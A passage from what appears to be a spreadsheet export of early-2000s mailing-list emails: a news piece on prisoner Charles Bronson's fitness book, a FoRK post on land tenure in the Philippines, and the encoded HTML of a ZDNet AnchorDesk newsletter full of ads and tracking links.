  So why is it that men like Collins, Bronson and Boyle, who can be so
  destructive towards society on the outside, can become so creative once stuck
  on the inside? Steve Richards, Bronsons publisher, has published many books
  about criminal figures and believes the roots of this phenomenon are both
  pragmatic and profound. 
  He says: "Prison is sometimes the first time some criminals will ever have
  known a stable environment, and this can be the first time they have the
  chance to focus on their creative skills. 
  "It may also be the first time that they have really had the chance of an
  education, if their early years have been hard. It could be the first time
  anyone has offered them the chance to explore their creative talents." 
  However, Richards believes the reasons are also deeper than that. He says:
  "Once they are behind bars, the cold light of day hits them, and they examine
  the very essence of who they are. 
  "They ask themselves, am I a man who wants to be remembered for violence? Or
  am I a man who can contribute to society, who can be remembered for something
  good?" 
  Bronson - who was born Michael Gordon Peterson, but changed his name to that
  of the Hollywood star of the Death Wish films - has, so far, been remembered
  mainly for things bad. He was originally jailed for seven years for armed
  robbery in 1974, and has had a series of sentences added to his original term
  over the years as a result of attacking people in prison. In 2000 he was
  jailed for life after being convicted of holding a teacher hostage for nearly
  two days during a jail siege. 
  Standing five feet ten and a half inches tall and weighing 210lbs, he is
  renowned for his strength. He has bent metal cell doors with his bare hands
  and does up to 3,000 - yes, 3,000 - press-ups a day. As he puts it: "I can hit
  a man 20 times in four seconds, I can push 132 press ups in 60 seconds." 
  But judging by our current obsession with health and exercise, Solitary
  Fitness might be the book which will see Bronsons face sitting on every
  coffee table in the land. He might be the man to give us the dream body which
  so many so-called fitness gurus promise but fail to motivate us into. Because
  Bronson has learned to use words as powerfully as he can use his fists. 
  "All this crap about high-protein drinks, pills, diets, its just a load of
  bollocks and a multi-million-pound racket," he writes, in what can only be
  described as a refreshingly honest style. "We can all be fat lazy bastards,
  its our choice, Im sick of hearing and reading about excuses, if you stuff
  your face with shit you become shit, thats logical to me." 
  As motivational mantras go, that might be just the kick up the, er, backside
  we all needed. 
  Solitary Fitness by Charles Bronson is published by Mirage Publishing and will
  be available in bookstores from October at 7.99
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: The Curse of India's Socialism
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-08-20 at 14:16, Dave Long wrote:
 &gt; &gt;                                                                   In the
 &gt; &gt; Philippines, getting legal title can take 20 years.  In Egypt, about 80%
 &gt; &gt; of the population in Cairo lives in places where they are officially
 &gt; &gt; illegal.
 &gt; 
 &gt; If the situation in Egypt is anything
 &gt; like the situation in the Philippines,
 &gt; it's because people (due to a strange
 &gt; desire for jobs) squat on land which
 &gt; they don't own.*
 The Philippines suffers from a Spanish-imposed aristocratic landowner
 class, the same as in most of Latin America, with the serf-like
 relationships that go with it.  You have multiple generations of
 peasants/squatters that cultivate and live on the lands almost as a
 human parts of the property package.
 The problem in the Philippines is that the landowner class is fading,
 but the peasants are still operating under the old economic assumption
 even though it isn't being imposed on them in most cases.  In a number
 of areas, you have landowners that don't use their lands during bad
 years (i.e. when sugar prices fall too low or some other condition that
 makes planting unprofitable in the global economy) and in some cases
 have all but abandoned them, but when they come back to plant crops
 several years later they find the same peasants living on the fallow
 land as scratch farmers to survive and waiting for the landowner to come
 back and give them something to do.
 The government's solution to this was to "redistribute" fallow land to
 the peasants that lived on them, and created a number of problems in the
 process.  First of all, it meant that all the agricultural producers had
 to plant crops all the time (profitable or not) or the government would
 seize the land and give it to someone else, which is not economically
 optimal by any means.  Second when they give it to the peasants, they
 use it to become scratch farmers, which is not a particularly productive
 economic activity, and the landowners generally let them do that for
 free when the land is fallow anyway.  Third, the peasants generally
 *prefer* to work for the landowner rather than own the land themselves;
 they make more money, have more opportunities to become middle-class,
 and enjoy a better lifestyle under that arrangement.  So the result of
 all this is that the landowners either run an economically sub-optimal
 agriculture business to protect their lands, or they risk having their
 land seized without compensation and given to the peasants/squatters who
 will gladly sell it back to the plantation owner rather than becoming
 scratch farmers, another economically sub-optimal solution. The only
 real role of the government in this arrangement is to be a drag on the
 economy.
 And I don't know about 20 years for land titles in the Philippines.  It
 takes a little longer than in the US (though not much), and you may have
 to bribe someone to make it work well in an expedited manner, but it
 isn't that onerous in the regions I'm familiar with.
 Speaking as a former Philippine plantation owner. (Yes, really. On
 Negros and Cebu. Have I led a strange life or what?)
 -James Rogers
  jamesr@best.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MS/Apple: Can this marriage be saved? (I doubt it) [ANCHORDESK]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</si>
  <si>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=3D30-u8NEIRrPLwvPIzv8IeOdSKzjX1iR" &gt;&lt;img src=3D"http://www.zdnet.com/graph=
 ics/newsletters/hd_anchor.gif" width=3D"440" height=3D"60" border=3D"0"  al=
 t=3D"AnchorDesk Daily"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D160 align=3Dcenter valign=3Dtop rowspan=3D2 bgcolor=3D"#ffffff"=
 &gt;
         &lt;br&gt;
         &lt;!--tower --&gt;
       &lt;div align=3D"center"&gt;&lt;img src=3D"http://i.i.com.com/cnwk.1d/Ads/comm=
 on/advertisement.gif" width=3D"120" height=3D"10" border=3D"0"&gt;&lt;/br&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D45-fNkJIKBij6jwUVz-EDvznhj=
 onlZR" target=3D"new"&gt;  =20
 &lt;img src=3D"http://www.techrepublic.com/images/ads/ban_160x600_domainsgirl3=
 .gif" width=3D"160" height=3D"600" border=3D"0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href=3D"http://clickthru.online.com/Click?q=3D5b-5LOwIBK=
 kZhFFYL3xCjjvDSwizzcR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/b&gt;&lt;/font&gt;=
 &lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" h=
 eight=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D70-3vnJIdp=
 iybdmO2pKns2asfI8UkRR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/b&gt;&lt;/fo=
 nt&gt;&lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1=
 " height=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D85-2G2oQ7K=
 reJoYyitaf70SVbToBBPR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Find out the top 10 Web services security requirements at Tech Update.&lt;/b&gt;&lt;=
 /font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=
 =3D"1" height=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D9a-b6_GQTM=
 pSkXyw6pFigi7yr9FKgnR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;=
 /b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" wid=
 th=3D"1" height=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Daf--dB8QLp=
 7D-RouLpydDX7NdmUVSeR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Check out thousands of IT job listings in ZDNet's Career Center.&lt;/b&gt;&lt;/font&gt;=
 &lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" h=
 eight=3D"6"&gt;&lt;br&gt;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&gt;FRI JUL 19,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ck?q=3Dc4-Iy9lQ0WstJFP-onkHF6q-jPexAyR" &gt;&lt;b&gt;MS/Apple: Can this marriage be =
 saved? (I doubt it)&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/grap=
 hics/clear.gif" width=3D"1" height=3D"4"&gt;&lt;br&gt;
                 Apple is cutting hardware prices, raising software prices, =
 building features into OS X that compete with MS Office, and placing ads ur=
 ging Windows users to switch. Are these the first signs of an Apple/MS divo=
 rce? Here's what I think.&lt;p&gt;
         =20
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dda-dT8jQUP=
 7l4HS9R3bjsMVKpv3DxnR" &gt;&lt;b&gt;NOTE: Why we're changing our publishing schedule=
 &lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage=
 /b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Def-04uYQmk=
 x5ZwF13HqBxDVAmoBameR" &gt;&lt;b&gt;PLUS: AnchorDesk Radio: The latest chips from Nv=
 idia and ATI&lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchorde=
 sk/frontpage/b.gif"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href=3D"http://clickthru.online.com/Click?q=3D04-k9W0IFQcTfUWU98=
 98BbBL7kOi_yR" &gt;Tighter PC security... Encrypt your laptop... Pittman leavi=
 ng AOL &lt;/a&gt;&lt;p&gt;
         =20
        =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D19-BLe0I2rcgevnM89=
 KMZ2Fz8IR7XlR" &gt;Your top tips for shaping up flabby hard drives &lt;/a&gt;&lt;p&gt;
         =20
        =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D2e-eMTGIiKj5M2iWA6=
 ktQ3DlPfP8N4R" &gt;Here's what I think of Jobs's Macworld keynote&lt;/a&gt;&lt;p&gt;
                =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D43-coL5IBJ3L8YD_Pm=
 9Z5VKc-3P0BcR" &gt;TiVo: Why it gets no gold stars for mandatory ads&lt;/a&gt;&lt;p&gt;
                =20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
 g=3D"0" border=3D"0" bgcolor=3D"#ffffff"&gt;    &lt;tr bgcolor=3D"#999999"&gt;&lt;td co=
 lspan=3D"7" height=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#ff=
 ffff" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fron=
 tpage/b.gif" height=3D1 width=3D3&gt;&lt;b&gt;Crucial Clicks: More from ZDNet&lt;/b&gt;&lt;/f=
 ont&gt;&lt;/td&gt;&lt;/tr&gt;    &lt;tr&gt;    &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D=
 "http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=
 =3D1&gt;&lt;/td&gt;    &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/a=
 nchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;    &lt;td colspan=3D"3"&gt;=
 &lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" heigh=
 t=3D5 width=3D1&gt;&lt;/td&gt;    &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com=
 /graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;    &lt;td bgc=
 olor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/an=
 chordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;    &lt;/tr&gt;    &lt;tr valign=
 =3D"top"&gt;    &lt;td width=3D"100%"&gt;          &lt;table width=3D"100%"  cellpaddin=
 g=3D"0" cellspacing=3D"0" border=3D"0"&gt;        &lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;font =
 face=3D"verdana, geneva" color=3D"#333333" size=3D"-2"&gt;&lt;b&gt;MONITORS&lt;/b&gt;&lt;/fon=
 t&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gi=
 f" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;            &lt;tr valign=3D"top"&gt;    =
    &lt;td width=3D"85"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D59-y53=
 oIEn9utdDwHAlpW-B_KMqztFR" &gt;&lt;img src=3D"http://www.zdnet.com/products/graph=
 ics/040802_monitors.jpg" width=3D"85" height=3D"110" border=3D"0" alt=3D"" =
 /&gt;&lt;/a&gt;&lt;/td&gt;           &lt;td width=3D"5"&gt;&lt;img src=3D"http://www.zdnet.com/grap=
 hics/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;        &lt;td widt=
 h=3D"100%"&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;a href=3D"http://cl=
 ickthru.online.com/Click?q=3D6e-2aYjIyEG1DPJfKnQA5K-fxuEL59R" style=3D"text=
 -decoration:none"&gt;&lt;b&gt;A Porsche you can afford&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;    Brought to y=
 ou by Samsung and F.A. Porsche, the SyncMaster 171P is a sleek, 17-inch LCD=
  with sharp image quality and snazzy design. But ZDNet reviewers say it's a=
  bit pricey.        &lt;/font&gt;&lt;/td&gt;       &lt;/tr&gt;           &lt;tr&gt;&lt;td colspan=3D"3=
 "&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" hei=
 ght=3D3 width=3D1&gt;&lt;br /&gt;&lt;img src=3D"http://techupdate.zdnet.com/techupdate/=
 i/arrow_blue.gif" width=3D"8" height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;font f=
 ace=3D"arial, helvetica" size=3D"-1"&gt;&lt;a href=3D"http://clickthru.online.com=
 /Click?q=3D83-U-BXQYJq_ZAY8v6tuoAABMMPZ9rR" style=3D"text-decoration:none"&gt;=
 Read review&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;           &lt;/table&gt;    &lt;/td&gt;    &lt;td&gt;&lt;img sr=
 c=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 w=
 idth=3D5&gt;&lt;/td&gt;    &lt;td width=3D"180"&gt;         &lt;table cellpadding=3D"0" cells=
 pacing=3D"0" width=3D"180" border=3D"0" bgcolor=3D"#eeeeee"&gt;        &lt;tr bgc=
 olor=3D"#999999"&gt;&lt;td colspan=3D"3" height=3D"15"&gt;&lt;font face=3D"ms sans seri=
 f, geneva" color=3D"#ffffff" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/g=
 raphics/anchordesk/frontpage/b.gif" height=3D1 width=3D3&gt;Most Popular Produ=
 cts&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;      &lt;tr&gt;            &lt;td&gt;&lt;img src=3D"http://www.zdnet.=
 com/graphics/anchordesk/frontpage/b.gif" width=3D"10" height=3D"1" alt=3D""=
  border=3D"0" /&gt;&lt;/td&gt;         &lt;td&gt;&lt;font face=3D"ms sans serif, geneva" size=
 =3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gi=
 f" width=3D"1" height=3D"5" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;            &lt;b&gt;Mo=
 nitors&lt;/b&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontp=
 age/b.gif" width=3D"1" height=3D"7" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;        &lt;=
 b&gt;1&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click?q=3D98-FTaOQ_z4Y8wzqR=
 4CW5CH7esbKRiR" style=3D"text-decoration:none"&gt;Samsung SyncMaster 151S&lt;/a&gt;&lt;=
 br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" =
 width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;     &lt;b&gt;2&lt;/b&gt;. &lt;a hr=
 ef=3D"http://clickthru.online.com/Click?q=3Dad-_4IAQzEpaIFnNBlQhaIHsSzky0PR=
 " style=3D"text-decoration:none"&gt;NEC MultiSync 1550V&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"h=
 ttp://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=
 =3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;          &lt;b&gt;3&lt;/b&gt;. &lt;a href=3D"http://=
 clickthru.online.com/Click?q=3Dc2-oXxLQUEDqUaWo4rgVnxXFZcIuInR" style=3D"te=
 xt-decoration:none"&gt;Envision EN-5100e&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet=
 .com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D""=
  border=3D"0" /&gt;&lt;br /&gt;            &lt;b&gt;4&lt;/b&gt;. &lt;a href=3D"http://clickthru.onl=
 ine.com/Click?q=3Dd7-wk3ZQLWDyUmJDgcRmBekeVktk2eR" style=3D"text-decoration=
 :none"&gt;Samsung SyncMaster 570 V&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/g=
 raphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" borde=
 r=3D"0" /&gt;&lt;br /&gt;          &lt;b&gt;5&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3Ded-jLlvQgV7qkUkUVcxv3orMjEsaQPR" style=3D"text-decoration:none"&gt;S=
 amsung SyncMaster 955 DF&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics=
 /anchordesk/frontpage/b.gif" width=3D"1" height=3D"6" alt=3D"" border=3D"0"=
  /&gt;&lt;br /&gt;            &lt;img src=3D"http://techupdate.zdnet.com/techupdate/i/a=
 rrow_blue.gif" width=3D"8" height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;b&gt;&lt;a href=
 =3D"http://clickthru.online.com/Click?q=3D02-qia9IljjNkKO_m7_XGuwrfzJ6nnR" =
 style=3D"text-decoration:none"&gt;More popular monitors&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;         =
 &lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=
 =3D"1" height=3D"10" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;            &lt;/font&gt;&lt;/td&gt;=
             &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontp=
 age/b.gif" width=3D"10" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         =
 &lt;/tr&gt;           &lt;/table&gt;    &lt;/td&gt;    &lt;/tr&gt;    &lt;tr valign=3D"top"&gt;&lt;td colspa=
 n=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gi=
 f" height=3D5 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;    &lt;tr&gt;&lt;td colspan=3D"7" bgcolor=3D"#999=
 999"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" =
 height=3D1 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;    &lt;/table&gt;    &lt;!-- /### --&gt; &lt;table cellpad=
 ding=3D10 border=3D0 cellspacing=3D0&gt;
 &lt;tr&gt;&lt;td&gt;=20
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D17-agitI5XQeDrnaDrIz4s1RhjGRseR"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://clickthru.online.com/Click?q=3D2c-DatOIc0kqhK51D5c-r7MBvWpjuyR" &gt;&lt;b&gt;Tigh=
 ter PC security... Encrypt your laptop... Pittman leaving AOL&lt;/b&gt;&lt;/a&gt;&lt;br&gt;Th=
 e government supports a benchmark that protects computers from hack attacks=
  and   viruses. Plus: A start-up unveils software that lets you easily encr=
 ypt data. And AOL   Time Warner COO Bob Pittman is leaving the company. &lt;/f=
 ont&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;
          &lt;!--------AD-----------------------------------&gt;
        =20
 &lt;!--------/AD-----------------------------------&gt;
 &lt;br&gt;
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D42-rF7cIPKGJAvfr3ppz3F7_4EMIrdR" &gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/header2_your.gif" width=3D"150" height=3D"2=
 0" border=3D"0" vspace=3D10 alt=3D"News Analysis"&gt;&lt;/a&gt;&lt;br&gt; &lt;table cellpaddi=
 ng=3D0 cellspacing=3D0 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;DAVID MORGENSTERN&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/445.gif" alt=3D"DAVID MORGENSTERN" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"5"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D57-YJIXII0aTAfkitLF0F_wt9Q9dZuR" &gt;&lt;b&gt;Your=
  top tips for shaping up flabby hard drives&lt;/b&gt;&lt;/a&gt;&lt;br&gt;AnchorDesk readers k=
 now that using defrag software on a regular basis makes their hard drives r=
 un smoothly and efficiently. David shares a list of readers' favorite apps,=
  plus advice on preparing drives for the process. &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
         =20
        =20
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D6c-SUL3IuP88_S_8w5KQCL5-NPyEdsR" &gt;&lt;b&gt;Quic=
 kPoll results: Would you pay $5 to speed up Web surfing?&lt;/b&gt; &lt;/a&gt;&lt;/font&gt;&lt;p&gt;
        =20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e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;STEPHAN SOMOGYI&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/166.gif" alt=3D"STEPHAN SOMOGYI" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D81-z1IaQ-K=
 pQsz5u21pqfRO9R6BpKlR" &gt;&lt;b&gt;Here's what I think of Jobs's Macworld keynote&lt;/=
 b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.gif=
 " width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Never one to shy away from Friday-morning quarterbacking, S=
 tephan deconstructs both the good and bad in Steve Jobs's Macworld Expo key=
 note. Read on for his take on everything from .Mac to the new iMac.&lt;/font&gt;&lt;=
 /td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
        =20
                 =20
                =20
                        =20
                                     &lt;table cellpadding=3D0 cellspacing=3D0 =
 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;STEVE KOVSKY&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/473.gif" alt=3D"STEVE KOVSKY" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D96-pjdWQtd=
 hd93zk1ejZWSoS2P4Jm4R" &gt;&lt;b&gt;TiVo: Why it gets no gold stars for mandatory ad=
 s&lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.=
 gif" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 First TiVo forced subscribers' machines to record sitcoms t=
 hey didn't want. Now the company is planting ads on their lists of favorite=
  programs. No wonder TiVo owners have become such a bunch of whiners, says =
 Steve.&lt;/font&gt;&lt;/td&gt;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href=3D"http://clickthru.online.com/Click?q=3Dab-ZcQKQYp=
 Mbna0ewyXydit0M-0OvrR" &gt;&lt;b&gt;Want to become a PC know-it-all? Here's how&lt;/b&gt;&lt;=
 /a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" w=
 idth=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Want to be a power user? Wish you could master the inner wo=
 rkings of your PC and create Web pages? Preston has three downloadable guid=
 es for tweaking Windows XP, understanding the Registry, and writing HTML.&lt;/=
 font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
         &lt;P&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;  =20
 &lt;p&gt;
 &lt;hr size=3D1 width=3D"80% noshade align=3D"left"&gt;
 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
 &lt;div align=3Dcenter&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dc0-kfs-QWP1Iwu-XYt41H99K8F=
 ZuSiR" &gt;&lt;b&gt;AnchorDesk Home&lt;/b&gt;&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com=
 /Click?q=3Dd6-yw2KQMPMW6pO4HPnOIRzw0LGkk4R"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rl_login?email=3Dqqqqqqqqqq-zdnet@example.com&amp;brand=3Dzdnet'&gt;free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href=3D'http://clickthru.online.com/Click?q=3Deb-Hl7orSD=
 7zUbklPZWm6XdYcGMt-Ssi9RR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dlegit-=
 list-zdnet@example.com&amp;brand=3Dzdnet'&gt;Manage=20
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online=
 .com/Click?q=3D00-4FQlI9QDB2XcLB4bgi4cHr7W6TiR" &gt;FAQ&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D15-mYP_IGcDl=
 2k7JwtAV-hDEc2lRbPR"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href=3D"http://clickthru.online.com/Click?q=3D2b-2FVYINzw=
 pGvyIkAwzk0xBfd-8WrR" &gt;&lt;img src=3D"http://www.zdnet.com/graphics/newsletter=
 s/gl_ft.gif" width=3D75 height=3D43 border=3D0 alt=3D"ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D525&gt;&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#fffff=
 f"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D41-qqJ1IEKzoK2rLLXU5CfC=
 kxHB0FFR" style=3D"color: #fff"&gt;Home&lt;/a&gt; |&lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3D56-NwKYInnwtkU5BuBrctPQDwwaMC9R" style=3D"color: #fff"&gt;eBus=
 iness&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D6b-8g5ZIHEXs-d=
 SO5B80ywQ-4d0P6cR" style=3D"color: #fff"&gt;Security&lt;/a&gt; | &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3D80-KTKvQQ0J6P8TT0KoaDkjVsTLZ8iR" style=3D"col=
 or: #fff"&gt;Networking&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3D95-XdwrQvdKmPVvtPIr1yZeU_u_KnPR" style=3D"color: #fff"&gt;Applications&lt;/a&gt; =
 | &lt;a href=3D"http://clickthru.online.com/Click?q=3Daa-gBteQXUQ1Cwg_mlWLXZBX=
 qONOVnR" style=3D"color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href=3D"http://clickthru.=
 online.com/Click?q=3Dc0-kfs-QWP1Iwu-XSa41H99K8FZuSiR" style=3D"color: #fff"=
 &gt;Hardware&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3Dd5-p-viQzL=
